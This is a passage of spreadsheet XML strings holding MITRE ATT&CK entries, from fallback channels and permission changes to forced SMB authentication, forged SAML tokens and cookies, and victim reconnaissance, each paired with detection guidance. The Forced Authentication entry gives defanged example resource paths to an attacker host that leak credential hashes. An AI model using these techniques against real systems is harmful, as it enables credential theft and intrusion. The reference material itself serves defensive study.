    <t>Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; Ariel Shuper, Cisco; Brad Geesaman, @bradgeesaman; Daniel Oakley; David Fiser, @anu4is, Trend Micro; ExtraHop; Idan Frimark, Cisco; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Rory McCune, Aqua Security; Travis Smith, Tripwire; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team; Yuval Avrahami, Palo Alto Networks</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;tree&lt;/code&gt;, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt;. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1083</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration,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</si>
  <si>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T1222</t>
  </si>
  <si>
    <t>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</si>
  <si>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Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>File system access controls</t>
  </si>
  <si>
    <t>T1222.002</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Linux and Mac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</si>
  <si>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Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>04 February 2020</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification: Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)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
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>Firmware Corruption</t>
  </si>
  <si>
    <t>Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1495</t>
  </si>
  <si>
    <t>12 April 2019</t>
  </si>
  <si>
    <t>System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior.</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1187</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu</t>
  </si>
  <si>
    <t>T1606</t>
  </si>
  <si>
    <t>Forge Web Credentials</t>
  </si>
  <si>
    <t>Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606</t>
  </si>
  <si>
    <t>17 December 2020</t>
  </si>
  <si>
    <t>Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1606.002</t>
  </si>
  <si>
    <t>Forge Web Credentials: SAML Tokens</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/002</t>
  </si>
  <si>
    <t>This technique may be difficult to detect as SAML tokens are signed by a trusted certificate. The forging process may not be detectable since it is likely to happen outside of a defender's visibility, but subsequent usage of the forged token may be seen. Monitor for anomalous logins using SAML tokens created by a compromised or adversary generated token-signing certificate. These logins may occur on any on-premises resources as well as from any cloud environment that trusts the certificate.(Citation: Microsoft SolarWinds Customer Guidance) Search for logins to service providers using SAML SSO which do not have corresponding 4769, 1200, and 1202 events in the Domain.(Citation: Sygnia Golden SAML)
Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)</t>
  </si>
  <si>
    <t>Azure AD, Google Workspace, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Oleg Kolesnikov, Securonix</t>
  </si>
  <si>
    <t>T1606.001</t>
  </si>
  <si>
    <t>Forge Web Credentials: Web Cookies</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1606/001</t>
  </si>
  <si>
    <t>T1592</t>
  </si>
  <si>
    <t>Gather Victim Host Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).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</si>
  <si>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https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1592.004</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Client Configurations</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.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client configurations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[External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/004</t>
  </si>
  <si>
    <t>T1592.003</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Firmware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel)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[Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/003</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Hardware</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure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initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>T1592.002</t>
  </si>
  <si>
    <t>Gather Victim Host Information: Software</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1592/002</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)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</si>
  <si>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https://attack.mitre.org/techniques/T1589</t>
  </si>
  <si>
    <t>T1589.001</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Credentials</t>
  </si>
  <si>
    <t>Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets.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[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/001</t>
  </si>
  <si>
    <t>Lee Christensen, SpecterOps; Toby Kohlenberg; Vinayak Wadhwa, Lucideus</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Email Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: HackersArise Email)(Citation: CNET Leaks) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Email Accounts](https://attack.mitre.org/techniques/T1586/002)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/002</t>
  </si>
  <si>
    <t>T1589.003</t>
  </si>
  <si>
    <t>Gather Victim Identity Information: Employee Names</t>
  </si>
  <si>
    <t>Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1589/003</t>
  </si>
  <si>
    <t>T1590</t>
  </si>
  <si>
    <t>Gather Victim Network Information</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about networks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</si>
  <si>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https://attack.mitre.org/techniques/T1590</t>
  </si>
  <si>
    <t>T1590.002</t>
  </si>
  <si>
    <t>Gather Victim Network Information: DNS</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/002</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Domain Properties</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>T1590.005</t>
  </si>
  <si>
    <t>Gather Victim Network Information: IP Addresses</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about assigned IP addresses may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)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</si>
  <si>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https://attack.mitre.org/techniques/T1590/005</t>
  </si>
  <si>
    <t>T1590.006</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Security Appliances</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/006</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Topology</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>Gather Victim Network Information: Network Trust Dependencies</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information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[Trusted Relationship](https://attack.mitre.org/techniques/T1199)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>T1591</t>
  </si>
  <si>
    <t>Gather Victim Org Information</t>
  </si>
  <si>
